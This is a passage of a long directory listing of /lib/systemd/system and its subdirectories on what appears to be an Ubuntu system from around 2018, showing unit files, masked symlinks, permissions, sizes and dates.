- drwxr-xr-x 1 root root 78 Jun 22 2018 resolvconf.service.wants
- drwxr-xr-x 1 root root 66 Jun 22 2018 sigpwr.target.wants
- drwxr-xr-x 1 root root 30 Jun 22 2018 systemd-resolved.service.d
- drwxr-xr-x 1 root root 58 Jun 22 2018 systemd-timesyncd.service.d
- drwxr-xr-x 1 root root 56 Jun 22 2018 timers.target.wants
- -rw-r--r-- 1 root root 309 May 30 2018 pollinate.service
- -rw-r--r-- 1 root root 246 May 24 2018 apport-forward.socket
- -rw-r--r-- 1 root root 252 May 17 2018 snapd.autoimport.service
- -rw-r--r-- 1 root root 320 May 17 2018 snapd.core-fixup.service
- -rw-r--r-- 1 root root 237 May 17 2018 snapd.seeded.service
- -rw-r--r-- 1 root root 308 May 17 2018 snapd.service
- -rw-r--r-- 1 root root 287 May 17 2018 snapd.snap-repair.service
- -rw-r--r-- 1 root root 281 May 17 2018 snapd.snap-repair.timer
- -rw-r--r-- 1 root root 281 May 17 2018 snapd.socket
- -rw-r--r-- 1 root root 474 May 17 2018 snapd.system-shutdown.service
- lrwxrwxrwx 1 root root 27 May 9 2018 plymouth-log.service -> plymouth-read-write.service
- lrwxrwxrwx 1 root root 21 May 9 2018 plymouth.service -> plymouth-quit.service
- -rw-r--r-- 1 root root 412 May 9 2018 plymouth-halt.service
- -rw-r--r-- 1 root root 426 May 9 2018 plymouth-kexec.service
- -rw-r--r-- 1 root root 421 May 9 2018 plymouth-poweroff.service
- -rw-r--r-- 1 root root 194 May 9 2018 plymouth-quit.service
- -rw-r--r-- 1 root root 200 May 9 2018 plymouth-quit-wait.service
- -rw-r--r-- 1 root root 244 May 9 2018 plymouth-read-write.service
- -rw-r--r-- 1 root root 416 May 9 2018 plymouth-reboot.service
- -rw-r--r-- 1 root root 532 May 9 2018 plymouth-start.service
- -rw-r--r-- 1 root root 291 May 9 2018 plymouth-switch-root.service
- -rw-r--r-- 1 root root 490 May 9 2018 systemd-ask-password-plymouth.path
- -rw-r--r-- 1 root root 467 May 9 2018 systemd-ask-password-plymouth.service
- -rw-r--r-- 1 root root 391 May 2 2018 cloud-config.service
- -rw-r--r-- 1 root root 482 May 2 2018 cloud-final.service
- -rw-r--r-- 1 root root 580 May 2 2018 cloud-init-local.service
- -rw-r--r-- 1 root root 642 May 2 2018 cloud-init.service
- -rw-r--r-- 1 root root 328 Apr 20 2018 open-vm-tools.service
- -rw-r--r-- 1 root root 536 Apr 3 2018 cloud-config.target
- -rw-r--r-- 1 root root 256 Apr 3 2018 cloud-init.target
- -rw-r--r-- 1 root root 298 Mar 22 2018 vgauth.service
- lrwxrwxrwx 1 root root 21 Mar 8 2018 udev.service -> systemd-udevd.service
- lrwxrwxrwx 1 root root 14 Mar 8 2018 autovt@.service -> getty@.service
- lrwxrwxrwx 1 root root 9 Mar 8 2018 bootlogd.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 bootlogs.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 bootmisc.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 checkfs.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 checkroot-bootclean.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 checkroot.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 cryptdisks-early.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 cryptdisks.service -> /dev/null
- lrwxrwxrwx 1 root root 13 Mar 8 2018 ctrl-alt-del.target -> reboot.target
- lrwxrwxrwx 1 root root 25 Mar 8 2018 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
- lrwxrwxrwx 1 root root 23 Mar 8 2018 dbus-org.freedesktop.locale1.service -> systemd-localed.service
- lrwxrwxrwx 1 root root 22 Mar 8 2018 dbus-org.freedesktop.login1.service -> systemd-logind.service
- lrwxrwxrwx 1 root root 24 Mar 8 2018 dbus-org.freedesktop.network1.service -> systemd-networkd.service
- lrwxrwxrwx 1 root root 24 Mar 8 2018 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
- lrwxrwxrwx 1 root root 25 Mar 8 2018 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
- lrwxrwxrwx 1 root root 16 Mar 8 2018 default.target -> graphical.target
- lrwxrwxrwx 1 root root 9 Mar 8 2018 fuse.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 halt.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 hostname.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 hwclock.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 killprocs.service -> /dev/null
- lrwxrwxrwx 1 root root 28 Mar 8 2018 kmod.service -> systemd-modules-load.service
- lrwxrwxrwx 1 root root 28 Mar 8 2018 module-init-tools.service -> systemd-modules-load.service
- lrwxrwxrwx 1 root root 9 Mar 8 2018 motd.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 mountall-bootclean.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 mountall.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 mountdevsubfs.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 mountkernfs.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 mountnfs-bootclean.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 mountnfs.service -> /dev/null
- lrwxrwxrwx 1 root root 22 Mar 8 2018 procps.service -> systemd-sysctl.service
- lrwxrwxrwx 1 root root 16 Mar 8 2018 rc.local.service -> rc-local.service
- lrwxrwxrwx 1 root root 9 Mar 8 2018 rc.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 rcS.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 reboot.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 rmnologin.service -> /dev/null
- lrwxrwxrwx 1 root root 15 Mar 8 2018 runlevel0.target -> poweroff.target
- lrwxrwxrwx 1 root root 13 Mar 8 2018 runlevel1.target -> rescue.target
- lrwxrwxrwx 1 root root 17 Mar 8 2018 runlevel2.target -> multi-user.target
- lrwxrwxrwx 1 root root 17 Mar 8 2018 runlevel3.target -> multi-user.target
- lrwxrwxrwx 1 root root 17 Mar 8 2018 runlevel4.target -> multi-user.target
- lrwxrwxrwx 1 root root 16 Mar 8 2018 runlevel5.target -> graphical.target
- lrwxrwxrwx 1 root root 13 Mar 8 2018 runlevel6.target -> reboot.target
- lrwxrwxrwx 1 root root 9 Mar 8 2018 sendsigs.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 single.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 stop-bootlogd.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 stop-bootlogd-single.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 umountfs.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 umountnfs.service -> /dev/null
- lrwxrwxrwx 1 root root 9 Mar 8 2018 umountroot.service -> /dev/null
- lrwxrwxrwx 1 root root 27 Mar 8 2018 urandom.service -> systemd-random-seed.service
- lrwxrwxrwx 1 root root 9 Mar 8 2018 x11-common.service -> /dev/null
- -rw-r--r-- 1 root root 879 Mar 8 2018 basic.target
- -rw-r--r-- 1 root root 379 Mar 8 2018 bluetooth.target
- -rw-r--r-- 1 root root 358 Mar 8 2018 busnames.target
- -rw-r--r-- 1 root root 770 Mar 8 2018 console-getty.service
- -rw-r--r-- 1 root root 742 Mar 8 2018 console-shell.service
- -rw-r--r-- 1 root root 791 Mar 8 2018 container-getty@.service
- -rw-r--r-- 1 root root 394 Mar 8 2018 cryptsetup-pre.target
- -rw-r--r-- 1 root root 366 Mar 8 2018 cryptsetup.target
- -rw-r--r-- 1 root root 1010 Mar 8 2018 debug-shell.service
- -rw-r--r-- 1 root root 670 Mar 8 2018 dev-hugepages.mount
- -rw-r--r-- 1 root root 624 Mar 8 2018 dev-mqueue.mount
- -rw-r--r-- 1 root root 1009 Mar 8 2018 emergency.service
- -rw-r--r-- 1 root root 431 Mar 8 2018 emergency.target
- -rw-r--r-- 1 root root 501 Mar 8 2018 exit.target
- -rw-r--r-- 1 root root 440 Mar 8 2018 final.target
- -rw-r--r-- 1 root root 1.5K Mar 8 2018 getty@.service
- -rw-r--r-- 1 root root 460 Mar 8 2018 getty.target
- -rw-r--r-- 1 root root 558 Mar 8 2018 graphical.target
- -rw-r--r-- 1 root root 487 Mar 8 2018 halt.target
- -rw-r--r-- 1 root root 447 Mar 8 2018 hibernate.target
- -rw-r--r-- 1 root root 468 Mar 8 2018 hybrid-sleep.target
- -rw-r--r-- 1 root root 630 Mar 8 2018 initrd-cleanup.service
- -rw-r--r-- 1 root root 553 Mar 8 2018 initrd-fs.target
- -rw-r--r-- 1 root root 790 Mar 8 2018 initrd-parse-etc.service
- -rw-r--r-- 1 root root 526 Mar 8 2018 initrd-root-fs.target
- -rw-r--r-- 1 root root 640 Mar 8 2018 initrd-switch-root.service
- -rw-r--r-- 1 root root 691 Mar 8 2018 initrd-switch-root.target
- -rw-r--r-- 1 root root 671 Mar 8 2018 initrd.target
- -rw-r--r-- 1 root root 664 Mar 8 2018 initrd-udevadm-cleanup-db.service
- -rw-r--r-- 1 root root 501 Mar 8 2018 kexec.target
- -rw-r--r-- 1 root root 677 Mar 8 2018 kmod-static-nodes.service
- -rw-r--r-- 1 root root 395 Mar 8 2018 local-fs-pre.target
- -rw-r--r-- 1 root root 507 Mar 8 2018 local-fs.target
- -rw-r--r-- 1 root root 405 Mar 8 2018 machine.slice
- -rw-r--r-- 1 root root 473 Mar 8 2018 mail-transport-agent.target
- -rw-r--r-- 1 root root 492 Mar 8 2018 multi-user.target
- -rw-r--r-- 1 root root 464 Mar 8 2018 network-online.target
- -rw-r--r-- 1 root root 461 Mar 8 2018 network-pre.target
- -rw-r--r-- 1 root root 480 Mar 8 2018 network.target
- -rw-r--r-- 1 root root 514 Mar 8 2018 nss-lookup.target
- -rw-r--r-- 1 root root 473 Mar 8 2018 nss-user-lookup.target
- -rw-r--r-- 1 root root 354 Mar 8 2018 paths.target
- -rw-r--r-- 1 root root 552 Mar 8 2018 poweroff.target
- -rw-r--r-- 1 root root 377 Mar 8 2018 printer.target
- -rw-r--r-- 1 root root 693 Mar 8 2018 proc-sys-fs-binfmt_misc.automount
- -rw-r--r-- 1 root root 603 Mar 8 2018 proc-sys-fs-binfmt_misc.mount
- -rw-r--r-- 1 root root 568 Mar 8 2018 quotaon.service
- -rw-r--r-- 1 root root 612 Mar 8 2018 rc-local.service
- -rw-r--r-- 1 root root 543 Mar 8 2018 reboot.target
- -rw-r--r-- 1 root root 396 Mar 8 2018 remote-fs-pre.target
- -rw-r--r-- 1 root root 482 Mar 8 2018 remote-fs.target
- -rw-r--r-- 1 root root 978 Mar 8 2018 rescue.service
- -rw-r--r-- 1 root root 486 Mar 8 2018 rescue.target
- -rw-r--r-- 1 root root 500 Mar 8 2018 rpcbind.target
- -rw-r--r-- 1 root root 1.1K Mar 8 2018 serial-getty@.service
- -rw-r--r-- 1 root root 402 Mar 8 2018 shutdown.target
- -rw-r--r-- 1 root root 362 Mar 8 2018 sigpwr.target
- -rw-r--r-- 1 root root 420 Mar 8 2018 sleep.target
- -rw-r--r-- 1 root root 403 Mar 8 2018 -.slice
- -rw-r--r-- 1 root root 409 Mar 8 2018 slices.target
- -rw-r--r-- 1 root root 380 Mar 8 2018 smartcard.target
- -rw-r--r-- 1 root root 356 Mar 8 2018 sockets.target
- -rw-r--r-- 1 root root 380 Mar 8 2018 sound.target
- -rw-r--r-- 1 root root 441 Mar 8 2018 suspend.target
- -rw-r--r-- 1 root root 353 Mar 8 2018 swap.target
- -rw-r--r-- 1 root root 715 Mar 8 2018 sys-fs-fuse-connections.mount
- -rw-r--r-- 1 root root 518 Mar 8 2018 sysinit.target
- -rw-r--r-- 1 root root 719 Mar 8 2018 sys-kernel-config.mount
- -rw-r--r-- 1 root root 662 Mar 8 2018 sys-kernel-debug.mount
- -rw-r--r-- 1 root root 1.3K Mar 8 2018 syslog.socket
- -rw-r--r-- 1 root root 646 Mar 8 2018 systemd-ask-password-console.path
- -rw-r--r-- 1 root root 653 Mar 8 2018 systemd-ask-password-console.service
- -rw-r--r-- 1 root root 574 Mar 8 2018 systemd-ask-password-wall.path
- -rw-r--r-- 1 root root 681 Mar 8 2018 systemd-ask-password-wall.service
- -rw-r--r-- 1 root root 724 Mar 8 2018 systemd-backlight@.service
- -rw-r--r-- 1 root root 959 Mar 8 2018 systemd-binfmt.service
- -rw-r--r-- 1 root root 650 Mar 8 2018 systemd-bootchart.service
- -rw-r--r-- 1 root root 1.0K Mar 8 2018 systemd-bus-proxyd.service
- -rw-r--r-- 1 root root 409 Mar 8 2018 systemd-bus-proxyd.socket
- -rw-r--r-- 1 root root 497 Mar 8 2018 systemd-exit.service
- -rw-r--r-- 1 root root 551 Mar 8 2018 systemd-fsckd.service
- -rw-r--r-- 1 root root 540 Mar 8 2018 systemd-fsckd.socket
- -rw-r--r-- 1 root root 674 Mar 8 2018 systemd-fsck-root.service
- -rw-r--r-- 1 root root 648 Mar 8 2018 systemd-fsck@.service
- -rw-r--r-- 1 root root 544 Mar 8 2018 systemd-halt.service
- -rw-r--r-- 1 root root 631 Mar 8 2018 systemd-hibernate-resume@.service
- -rw-r--r-- 1 root root 501 Mar 8 2018 systemd-hibernate.service
- -rw-r--r-- 1 root root 710 Mar 8 2018 systemd-hostnamed.service
- -rw-r--r-- 1 root root 778 Mar 8 2018 systemd-hwdb-update.service
- -rw-r--r-- 1 root root 519 Mar 8 2018 systemd-hybrid-sleep.service
- -rw-r--r-- 1 root root 480 Mar 8 2018 systemd-initctl.service
- -rw-r--r-- 1 root root 524 Mar 8 2018 systemd-initctl.socket
- -rw-r--r-- 1 root root 607 Mar 8 2018 systemd-journald-audit.socket
- -rw-r--r-- 1 root root 1.1K Mar 8 2018 systemd-journald-dev-log.socket
- -rw-r--r-- 1 root root 1.3K Mar 8 2018 systemd-journald.service
- -rw-r--r-- 1 root root 842 Mar 8 2018 systemd-journald.socket
- -rw-r--r-- 1 root root 731 Mar 8 2018 systemd-journal-flush.service
- -rw-r--r-- 1 root root 557 Mar 8 2018 systemd-kexec.service
- -rw-r--r-- 1 root root 691 Mar 8 2018 systemd-localed.service
- -rw-r--r-- 1 root root 1.2K Mar 8 2018 systemd-logind.service
- -rw-r--r-- 1 root root 693 Mar 8 2018 systemd-machine-id-commit.service
- -rw-r--r-- 1 root root 967 Mar 8 2018 systemd-modules-load.service
- -rw-r--r-- 1 root root 1.3K Mar 8 2018 systemd-networkd.service
- -rw-r--r-- 1 root root 591 Mar 8 2018 systemd-networkd.socket
- -rw-r--r-- 1 root root 685 Mar 8 2018 systemd-networkd-wait-online.service
- -rw-r--r-- 1 root root 553 Mar 8 2018 systemd-poweroff.service
- -rw-r--r-- 1 root root 614 Mar 8 2018 systemd-quotacheck.service
- -rw-r--r-- 1 root root 717 Mar 8 2018 systemd-random-seed.service
- -rw-r--r-- 1 root root 548 Mar 8 2018 systemd-reboot.service
- -rw-r--r-- 1 root root 757 Mar 8 2018 systemd-remount-fs.service
- -rw-r--r-- 1 root root 907 Mar 8 2018 systemd-resolved.service
- -rw-r--r-- 1 root root 696 Mar 8 2018 systemd-rfkill.service
- -rw-r--r-- 1 root root 617 Mar 8 2018 systemd-rfkill.socket
- -rw-r--r-- 1 root root 497 Mar 8 2018 systemd-suspend.service
- -rw-r--r-- 1 root root 653 Mar 8 2018 systemd-sysctl.service
- -rw-r--r-- 1 root root 655 Mar 8 2018 systemd-timedated.service
- -rw-r--r-- 1 root root 1.1K Mar 8 2018 systemd-timesyncd.service
- -rw-r--r-- 1 root root 598 Mar 8 2018 systemd-tmpfiles-clean.service
- -rw-r--r-- 1 root root 450 Mar 8 2018 systemd-tmpfiles-clean.timer
- -rw-r--r-- 1 root root 703 Mar 8 2018 systemd-tmpfiles-setup-dev.service
- -rw-r--r-- 1 root root 683 Mar 8 2018 systemd-tmpfiles-setup.service
- -rw-r--r-- 1 root root 578 Mar 8 2018 systemd-udevd-control.socket
- -rw-r--r-- 1 root root 570 Mar 8 2018 systemd-udevd-kernel.socket
- -rw-r--r-- 1 root root 825 Mar 8 2018 systemd-udevd.service
- -rw-r--r-- 1 root root 823 Mar 8 2018 systemd-udev-settle.service
- -rw-r--r-- 1 root root 743 Mar 8 2018 systemd-udev-trigger.service
- -rw-r--r-- 1 root root 757 Mar 8 2018 systemd-update-utmp-runlevel.service
- -rw-r--r-- 1 root root 754 Mar 8 2018 systemd-update-utmp.service
- -rw-r--r-- 1 root root 573 Mar 8 2018 systemd-user-sessions.service
- -rw-r--r-- 1 root root 436 Mar 8 2018 system.slice
- -rw-r--r-- 1 root root 585 Mar 8 2018 system-update.target
- -rw-r--r-- 1 root root 405 Mar 8 2018 timers.target
- -rw-r--r-- 1 root root 395 Mar 8 2018 time-sync.target
- -rw-r--r-- 1 root root 417 Mar 8 2018 umount.target
- -rw-r--r-- 1 root root 528 Mar 8 2018 user@.service
- -rw-r--r-- 1 root root 392 Mar 8 2018 user.slice
- -rw-r--r-- 1 root root 225 Mar 6 2018 apt-daily.service
- -rw-r--r-- 1 root root 156 Mar 6 2018 apt-daily.timer
- -rw-r--r-- 1 root root 238 Mar 6 2018 apt-daily-upgrade.service
- -rw-r--r-- 1 root root 184 Mar 6 2018 apt-daily-upgrade.timer
- -rw-r--r-- 1 root root 342 Feb 21 2018 getty-static.service
- -rw-r--r-- 1 root root 153 Feb 21 2018 sigpwr-container-shutdown.service
- -rw-r--r-- 1 root root 175 Feb 21 2018 systemd-networkd-resolvconf-update.path
- -rw-r--r-- 1 root root 715 Feb 21 2018 systemd-networkd-resolvconf-update.service
- -rw-r--r-- 1 root root 683 Dec 7 2017 lxd.service
- -rw-r--r-- 1 root root 206 Dec 7 2017 lxd-bridge.service
- -rw-r--r-- 1 root root 318 Dec 7 2017 lxd-containers.service
- -rw-r--r-- 1 root root 197 Dec 7 2017 lxd.socket
- -rw-r--r-- 1 root root 189 Nov 30 2017 uuidd.service
- -rw-r--r-- 1 root root 126 Nov 30 2017 uuidd.socket
- -rw-r--r-- 1 root root 420 Nov 29 2017 resolvconf.service
- -rw-r--r-- 1 root root 311 Nov 9 2017 lxcfs.service
- -rw-r--r-- 1 root root 670 Nov 8 2017 mdadm-shutdown.service
- -rw-r--r-- 1 root root 345 Apr 20 2017 unattended-upgrades.service
- -rw-r--r-- 1 root root 385 Mar 16 2017 ssh.service
- -rw-r--r-- 1 root root 196 Mar 16 2017 ssh@.service
- -rw-r--r-- 1 root root 216 Mar 16 2017 ssh.socket
- -rw-r--r-- 1 root root 269 Jan 31 2017 setvtrgb.service
- -rw-r--r-- 1 root root 491 Jan 12 2017 dbus.service
- -rw-r--r-- 1 root root 106 Jan 12 2017 dbus.socket
- -rw-r--r-- 1 root root 735 Nov 30 2016 networking.service
- -rw-r--r-- 1 root root 497 Nov 30 2016 ifup@.service
- -rw-r--r-- 1 root root 631 Nov 3 2016 accounts-daemon.service
- -rw-r--r-- 1 root root 285 Jun 16 2016 keyboard-setup.service
- -rw-r--r-- 1 root root 288 Jun 16 2016 console-setup.service
- lrwxrwxrwx 1 root root 9 Apr 16 2016 lvm2.service -> /dev/null
- -rw-r--r-- 1 root root 334 Apr 16 2016 dm-event.service
- -rw-r--r-- 1 root root 248 Apr 16 2016 dm-event.socket
- -rw-r--r-- 1 root root 380 Apr 16 2016 lvm2-lvmetad.service
- -rw-r--r-- 1 root root 215 Apr 16 2016 lvm2-lvmetad.socket
- -rw-r--r-- 1 root root 335 Apr 16 2016 lvm2-lvmpolld.service
- -rw-r--r-- 1 root root 213 Apr 16 2016 lvm2-lvmpolld.socket
- -rw-r--r-- 1 root root 658 Apr 16 2016 lvm2-monitor.service
- -rw-r--r-- 1 root root 382 Apr 16 2016 lvm2-pvscan@.service
- drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel1.target.wants
- drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel2.target.wants
- drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel3.target.wants
- drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel4.target.wants
- drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel5.target.wants
- -rw-r--r-- 1 root root 234 Apr 8 2016 acpid.service
- -rw-r--r-- 1 root root 251 Apr 5 2016 cron.service
- -rw-r--r-- 1 root root 290 Apr 5 2016 rsyslog.service
- -rw-r--r-- 1 root root 142 Mar 31 2016 apport-forward@.service
- -rw-r--r-- 1 root root 455 Mar 29 2016 iscsid.service
- -rw-r--r-- 1 root root 1.1K Mar 29 2016 open-iscsi.service
- -rw-r--r-- 1 root root 115 Feb 9 2016 acpid.socket
- -rw-r--r-- 1 root root 115 Feb 9 2016 acpid.path
- -rw-r--r-- 1 root root 169 Jan 14 2016 atd.service
- -rw-r--r-- 1 root root 182 Jan 14 2016 polkitd.service
- -rw-r--r-- 1 root root 790 Jun 1 2015 friendly-recovery.service
- -rw-r--r-- 1 root root 241 Mar 3 2015 ufw.service
- -rw-r--r-- 1 root root 250 Feb 24 2015 ureadahead-stop.service
- -rw-r--r-- 1 root root 242 Feb 24 2015 ureadahead-stop.timer
- -rw-r--r-- 1 root root 401 Feb 24 2015 ureadahead.service
- -rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service
- /lib/systemd/system/halt.target.wants:
- total 4.0K
- lrwxrwxrwx 1 root root 24 May 9 2018 plymouth-halt.service -> ../plymouth-halt.service
- /lib/systemd/system/initrd-switch-root.target.wants:
- total 8.0K
- lrwxrwxrwx 1 root root 25 May 9 2018 plymouth-start.service -> ../plymouth-start.service
- lrwxrwxrwx 1 root root 31 May 9 2018 plymouth-switch-root.service -> ../plymouth-switch-root.service
- /lib/systemd/system/kexec.target.wants:
- total 4.0K
- lrwxrwxrwx 1 root root 25 May 9 2018 plymouth-kexec.service -> ../plymouth-kexec.service
- /lib/systemd/system/multi-user.target.wants:
- total 32K
- lrwxrwxrwx 1 root root 24 May 9 2018 plymouth-quit.service -> ../plymouth-quit.service
- lrwxrwxrwx 1 root root 29 May 9 2018 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
- lrwxrwxrwx 1 root root 15 Mar 8 2018 getty.target -> ../getty.target
- lrwxrwxrwx 1 root root 33 Mar 8 2018 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
- lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-logind.service -> ../systemd-logind.service
- lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
- lrwxrwxrwx 1 root root 32 Mar 8 2018 systemd-user-sessions.service -> ../systemd-user-sessions.service
- lrwxrwxrwx 1 root root 15 Jan 12 2017 dbus.service -> ../dbus.service
- /lib/systemd/system/poweroff.target.wants:
- total 8.0K
- lrwxrwxrwx 1 root root 28 May 9 2018 plymouth-poweroff.service -> ../plymouth-poweroff.service
- lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
- /lib/systemd/system/reboot.target.wants:
- total 8.0K
- lrwxrwxrwx 1 root root 26 May 9 2018 plymouth-reboot.service -> ../plymouth-reboot.service
- lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
- /lib/systemd/system/sysinit.target.wants:
- total 108K
- lrwxrwxrwx 1 root root 30 May 9 2018 plymouth-read-write.service -> ../plymouth-read-write.service
- lrwxrwxrwx 1 root root 25 May 9 2018 plymouth-start.service -> ../plymouth-start.service
- lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
- lrwxrwxrwx 1 root root 24 Mar 8 2018 systemd-udevd.service -> ../systemd-udevd.service
- lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
- lrwxrwxrwx 1 root root 20 Mar 8 2018 cryptsetup.target -> ../cryptsetup.target
- lrwxrwxrwx 1 root root 22 Mar 8 2018 dev-hugepages.mount -> ../dev-hugepages.mount
- lrwxrwxrwx 1 root root 19 Mar 8 2018 dev-mqueue.mount -> ../dev-mqueue.mount
- lrwxrwxrwx 1 root root 28 Mar 8 2018 kmod-static-nodes.service -> ../kmod-static-nodes.service
- lrwxrwxrwx 1 root root 36 Mar 8 2018 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
- lrwxrwxrwx 1 root root 32 Mar 8 2018 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
- lrwxrwxrwx 1 root root 26 Mar 8 2018 sys-kernel-config.mount -> ../sys-kernel-config.mount
- lrwxrwxrwx 1 root root 25 Mar 8 2018 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
- lrwxrwxrwx 1 root root 36 Mar 8 2018 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
- lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-binfmt.service -> ../systemd-binfmt.service
- lrwxrwxrwx 1 root root 27 Mar 8 2018 systemd-journald.service -> ../systemd-journald.service
- lrwxrwxrwx 1 root root 32 Mar 8 2018 systemd-journal-flush.service -> ../systemd-journal-flush.service
- lrwxrwxrwx 1 root root 36 Mar 8 2018 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
- lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-modules-load.service -> ../systemd-modules-load.service
- lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-random-seed.service -> ../systemd-random-seed.service
- lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-sysctl.service -> ../systemd-sysctl.service
- lrwxrwxrwx 1 root root 37 Mar 8 2018 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
- lrwxrwxrwx 1 root root 33 Mar 8 2018 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
- lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-update-utmp.service -> ../systemd-update-utmp.service
- lrwxrwxrwx 1 root root 24 Oct 12 2017 console-setup.service -> ../console-setup.service
- lrwxrwxrwx 1 root root 25 Oct 12 2017 keyboard-setup.service -> ../keyboard-setup.service
- lrwxrwxrwx 1 root root 19 Oct 12 2017 setvtrgb.service -> ../setvtrgb.service
- /lib/systemd/system/sockets.target.wants:
- total 28K
- lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
- lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
- lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-initctl.socket -> ../systemd-initctl.socket
- lrwxrwxrwx 1 root root 32 Mar 8 2018 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
- lrwxrwxrwx 1 root root 34 Mar 8 2018 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
- lrwxrwxrwx 1 root root 26 Mar 8 2018 systemd-journald.socket -> ../systemd-journald.socket
- lrwxrwxrwx 1 root root 14 Jan 12 2017 dbus.socket -> ../dbus.socket
- /lib/systemd/system/busnames.target.wants:
- total 0
- /lib/systemd/system/getty.target.wants:
- total 4.0K
- lrwxrwxrwx 1 root root 23 Mar 8 2018 getty-static.service -> ../getty-static.service
- /lib/systemd/system/graphical.target.wants:
- total 4.0K
- lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
- /lib/systemd/system/local-fs.target.wants:
- total 4.0K
- lrwxrwxrwx 1 root root 29 Mar 8 2018 systemd-remount-fs.service -> ../systemd-remount-fs.service
- /lib/systemd/system/rc-local.service.d:
- total 4.0K
- -rw-r--r-- 1 root root 290 Feb 21 2018 debian.conf
- /lib/systemd/system/rescue.target.wants:
- total 4.0K
- lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
- /lib/systemd/system/resolvconf.service.wants:
- total 4.0K
- lrwxrwxrwx 1 root root 42 Mar 8 2018 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path
- /lib/systemd/system/sigpwr.target.wants:
- total 4.0K
- lrwxrwxrwx 1 root root 36 Mar 8 2018 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service
- /lib/systemd/system/systemd-resolved.service.d:
- total 4.0K
- -rw-r--r-- 1 root root 200 Feb 21 2018 resolvconf.conf
- /lib/systemd/system/systemd-timesyncd.service.d:
- total 4.0K
- -rw-r--r-- 1 root root 251 Feb 21 2018 disable-with-time-daemon.conf
- /lib/systemd/system/timers.target.wants:
- total 4.0K
- lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer
- /lib/systemd/system/runlevel1.target.wants:
- total 0
- /lib/systemd/system/runlevel2.target.wants:
- total 0
- /lib/systemd/system/runlevel3.target.wants:
- total 0
- /lib/systemd/system/runlevel4.target.wants:
- total 0
- /lib/systemd/system/runlevel5.target.wants:
- total 0
- /lib/systemd/system-generators:
- total 708K
- -rwxr-xr-x 1 root root 19K May 17 2018 snapd-generator
- -rwxr-xr-x 1 root root 4.8K Apr 3 2018 cloud-init-generator
- -rwxr-xr-x 1 root root 71K Mar 8 2018 systemd-cryptsetup-generator
